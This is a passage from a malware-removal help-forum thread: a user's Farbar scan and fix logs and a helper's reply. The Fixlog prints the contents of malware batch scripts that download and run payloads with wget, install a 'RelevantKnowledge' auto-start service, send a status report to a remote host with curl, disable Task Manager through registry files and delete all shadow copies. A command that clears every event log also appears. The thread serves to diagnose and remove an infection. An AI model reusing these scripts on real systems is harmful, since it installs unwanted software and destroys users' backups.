FirewallRules: [{023EC48C-AAA6-4832-8DEF-E77068991D61}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe No File
FirewallRules: [{A9B6A8FC-243F-45C5-B45E-B94CA201DFA7}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{59B2491E-5BF2-4DC5-AE8D-F34BD2AC1230}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{EF33A6D0-D34B-4630-9AE0-D5B6319C642D}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{0C8E4F25-226B-4BC9-BBD0-A6FDD1D99E01}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{E5EC7B01-738D-42B0-960C-4051ADBF6E85}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{28B9FA2D-E66B-453A-9DAB-DDB820A60893}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{2F79B4C8-3AFC-4E30-B1B2-EE4203877302}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{FEE98E1E-A352-4C6D-A55F-F641B4E69F55}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{A16DB9E7-288D-4E5B-BD58-5404E7DED756}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{986F830C-A0F0-4829-A1D3-6E209C9346FE}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9E97B312-F759-4491-9B4A-9A7F7BD66B49}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{3B74B220-3059-4A75-949E-50972E487A28}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{187F27A2-9AE2-489B-B927-B8FC03CC268B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{A9130200-545F-467A-9A36-1B798C073847}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{5DEA6D27-54CF-4606-949E-BD3C17E5B786}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [TCP Query User{DF58AEE1-F55F-4C53-ADDB-ACE482856AE1}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{872BEA53-323F-4801-81BF-7FFB853B9696}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8EB9B601-87D3-4318-8ED9-03D843F1590B}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{597233C9-A6EB-4645-8677-888825AFC9CE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{4077A009-74D8-44BE-AD00-C76EEF7EE5BD}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [{DAE1B584-4569-4BAB-B953-D64ABABDAAD5}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [TCP Query User{3B57E49F-50A7-468F-A210-D44AA14F7EE4}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [UDP Query User{13BD579F-4B71-49B9-9983-2D442B1932E8}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [{CF745F74-D653-4FD3-8D0D-19E40F7120AE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{AB407DB0-7E44-4FFA-A876-AC39F106ECB0}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{6D250D03-52C1-4019-980F-9AC5B16C218B}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [{79C5FF69-9C6C-4795-BBBF-8058548DF184}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C22CAF2C-8CE3-4B0E-B3E7-5A8C676B5F8E}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [UDP Query User{DCFA2E94-61CF-4517-A82F-AA51C00BB916}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [{9B9900F7-F341-4F67-A222-BA5ADB3D415F}] => (Block) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WShelper.exe No File
FirewallRules: [{C27B1110-1C16-4970-BA34-D7815EC04CD1}] => (Allow) c:\program files (x86)\opera\63.0.3368.107\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{5F4157A8-99BC-42D7-9E0B-83BC577FB74E}] => (Allow) c:\program files (x86)\opera\64.0.3417.92\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{E312F188-3203-4E00-8BD8-6B9B54F77B8A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 
==================== Restore Points =========================
 
16-11-2019 17:22:21 Removed Betternet for Windows 5.3.0.433
18-11-2019 19:29:54 Removed Nero 8. Available with Windows Installer version 1.2 and later.
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
Error: (11/18/2019 07:56:02 PM) (Source: MsiInstaller) (EventID: 1024) (User: Vladana-PC)
Description: Product: Adobe Acrobat Reader DC - Update 'Adobe Acrobat Reader DC
 (19.010.20098)' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft....k/?LinkId=23127
 
Error: (11/18/2019 07:55:56 PM) (Source: MsiInstaller) (EventID: 11722) (User: Vladana-PC)
Description: Product: Adobe Acrobat Reader DC -- Error 1722.There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action InstallWebResources, location: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe, command: 19.010.20098 18.011.20063.0
 
Error: (11/18/2019 07:39:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ZeroConfigService.exe, version: 15.1.1.2, time stamp: 0x4f8e1e73
Faulting module name: MurocApi.dll, version: 15.1.1.1, time stamp: 0x4f8e1ce7
Exception code: 0xc0000005
Fault offset: 0x000000000002be1b
Faulting process id: 0xdac
Faulting application start time: 0x01d59e3f79bc5d73
Faulting application path: C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
Faulting module path: C:\Program Files\Intel\WiFi\bin\MurocApi.dll
Report Id: c0d69ba9-0a32-11ea-9086-2cd44493347b
 
Error: (11/18/2019 07:29:29 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nero\Nero8\Nero Toolkit\DiscSpeed.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_fa62ad231704eab7.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd.manifest.
 
Error: (11/18/2019 07:29:29 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nero\Nero8\Nero Toolkit\DiscSpeed.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_fa62ad231704eab7.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd.manifest.
 
Error: (11/18/2019 06:33:18 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\TIS_Windows7PIM.dll".
Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/18/2019 06:30:28 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nero\Nero8\Nero Toolkit\DiscSpeed.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_fa62ad231704eab7.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd.manifest.
 
Error: (11/17/2019 06:59:21 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\TIS_Windows7PIM.dll".
Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
 
System errors:
=============
Error: (11/18/2019 08:45:07 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/18/2019 08:38:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Freemake Improver service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/18/2019 08:38:50 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Freemake Improver service to connect.
 
Error: (11/18/2019 07:44:42 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/18/2019 07:40:31 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel® PROSet/Wireless Zero Configuration Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (11/18/2019 07:39:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Freemake Improver service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/18/2019 07:39:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Freemake Improver service to connect.
 
Error: (11/18/2019 07:26:26 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
 
CodeIntegrity:
===================================
 
Date: 2019-11-18 20:54:53.563
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 20:42:30.056
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 20:26:08.897
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 20:19:42.211
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 20:11:42.317
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 19:50:11.629
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 19:42:57.810
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 15:51:54.319
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
==================== Memory info =========================== 
 
BIOS: FUJITSU // Phoenix Technologies Ltd. Version 1.08 10/02/2012
Motherboard: FUJITSU FJNBB29
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 97%
Total physical RAM: 3447.63 MB
Available physical RAM: 76.9 MB
Total Virtual: 6893.39 MB
Available Virtual: 2614.49 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:97.56 GB) (Free:19.07 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:368.1 GB) (Free:203.89 GB) NTFS
 
\\?\Volume{da4eedc3-7be1-11e2-8ac3-806e6f6e6963}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: EB90EB90)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=368.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt =======================


#7
RKinner


Not supposed to get the error. I have reported it to Farbar.

 

Looks like fixlist did not finish.  Let's see if a new one with fewer steps will work.

 



#8
vladana_91


This one worked!  =)  okay, so here are the copies you asked for...

 

Copy of Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (19-11-2019 01:41:53) Run:4
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CMD: dir C:\Windows\Wget
CMD: dir C:\Windows\Curl
CMD: type c:\windows\e.bat
CMD: type c:\windows\y.txt
CMD: type c:\windows\d.bat
CMD: type C:\Windows\mgr_n.reg
CMD: type  C:\Windows\mgr_f.reg
CMD: type  C:\Windows\e.reg
VirusTotal: C:\Windows\e.exe
VirusTotal: C:\Windows\d.exe
VirusTotal: C:\Windows\fr.exe
2019-11-17 00:17 - 2019-10-21 20:51 - 000002930 _____ C:\Windows\e.bat
2019-11-17 00:17 - 2019-07-30 17:00 - 000004608 _____ () C:\Windows\e.exe
2019-11-17 00:16 - 2019-09-12 17:27 - 000025600 _____ () C:\Windows\fr.exe
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\Wget
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\curl
2019-11-16 16:28 - 2019-10-12 19:40 - 000004608 _____ () C:\Windows\d.exe
2019-11-16 16:28 - 2019-09-12 15:16 - 000001241 _____ C:\Windows\d.bat
2019-11-16 16:28 - 2019-08-09 16:30 - 000000001 _____ C:\Windows\y.txt
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_n.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_f.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000290 _____ C:\Windows\e.reg
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{62634D95-960B-4834-8E71-A70408AD8FD9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EF076C91-DC9E-43E3-84ED-3D219E065A4F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.302\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll -> No File
ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
Reboot:
 
 
*****************
 
 
========= dir C:\Windows\Wget =========
 
 Volume in drive C has no label.
 Volume Serial Number is 7C43-366C
 
 Directory of C:\Windows\Wget
 
11/16/2019  04:28 PM    <DIR>          .
11/16/2019  04:28 PM    <DIR>          ..
11/16/2019  04:28 PM    <DIR>          bin
               0 File(s)              0 bytes
               3 Dir(s)  41,566,470,144 bytes free
 
========= End of CMD: =========
 
 
========= dir C:\Windows\Curl =========
 
 Volume in drive C has no label.
 Volume Serial Number is 7C43-366C
 
 Directory of C:\Windows\Curl
 
11/16/2019  04:28 PM    <DIR>          .
11/16/2019  04:28 PM    <DIR>          ..
08/21/2019  05:59 AM           596,992 curl.exe
               1 File(s)        596,992 bytes
               2 Dir(s)  41,566,470,144 bytes free
 
========= End of CMD: =========
 
 
========= type c:\windows\e.bat =========
 
@echo off 
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (
set "bits=32"
set "pdir=%ProgramFiles%"
) else (
set "bits=64"
set "pdir=%ProgramFiles(x86)%"
)
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 0 (
goto rk
) else (
exit
)
:rk
for /f "tokens=2*" %%a in ('reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%') do set "aid=%%b"
set /a "aid=%aid%"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlls.dll"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlls64.dll"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlservice.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg32.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg64.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg.exe"
if not exist "%pdir%\RelevantKnowledge\rlvknlg.exe" (
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlls.dll"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlls64.dll"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlservice.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg32.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg64.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg.exe"
) else ( 
goto next
)
:next
if exist "%pdir%\RelevantKnowledge\rlvknlg.exe" (
) else (
exit
)
sc create RelevantKnowledge binPath= "%pdir%\RelevantKnowledge\rlservice.exe /service" DisplayName= RelevantKnowledge start= auto Error= ignore
timeout /t 35
sc start RelevantKnowledge
start /normal "" "%pdir%\RelevantKnowledge\rlvknlg.exe"
set n=0
:check
set /a n=n+1
if exist "%pdir%\RelevantKnowledge\readme.txt" (
goto finish
) else (
goto before_finish
)
:before_finish
timeout /t 5
if %n% neq 360 goto check
if not exist "%pdir%\RelevantKnowledge\readme.txt" %windir%\curl\curl.exe "http://db.softfire.i...%aid%&status=2"
:finish
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "0" /f /reg:%bits%
Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe" /f /reg:%bits%
del %windir%\mgr_f.reg
del %windir%\mgr_n.reg
del %windir%\e.exe
vssadmin delete shadows /all /quiet
del %0
========= End of CMD: =========
 
 
========= type c:\windows\y.txt =========
 
1
========= End of CMD: =========
 
 
========= type c:\windows\d.bat =========
 
@echo off 
::
::
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (set "bits=32") else set "bits=64"
regedit /s %windir%\mgr_f.reg
timeout /t 30
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe"
if exist "%windir%\fr.exe" (
goto start_fr
) else (
timeout /t 120
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe"
if not exist "%windir%\fr.exe" exit
goto start_fr
)
:e
timeout /t 60
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat"
if exist "%windir%\e.bat" (
start %windir%\e.exe
) else (
timeout /t 120
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat"
if not exist "%windir%\e.bat" exit
start %windir%\e.exe
)
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 0 (
regedit /s %windir%\e.reg
del %windir%\e.reg
del %windir%\fr.exe
del %windir%\d.exe
del %windir%\s.txt
del %0
) else (
regedit /s %windir%\mgr_n.reg
exit
)
:start_fr
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 1 start %windir%\fr.exe
goto e
::
========= End of CMD: =========
 
 
========= type C:\Windows\mgr_n.reg =========
 
Windows Registry Editor Version 5.00
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
========= End of CMD: =========
 
 
========= type  C:\Windows\mgr_f.reg =========
 
Windows Registry Editor Version 5.00
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
========= End of CMD: =========
 
 
========= type  C:\Windows\e.reg =========
 
Windows Registry Editor Version 5.00
 
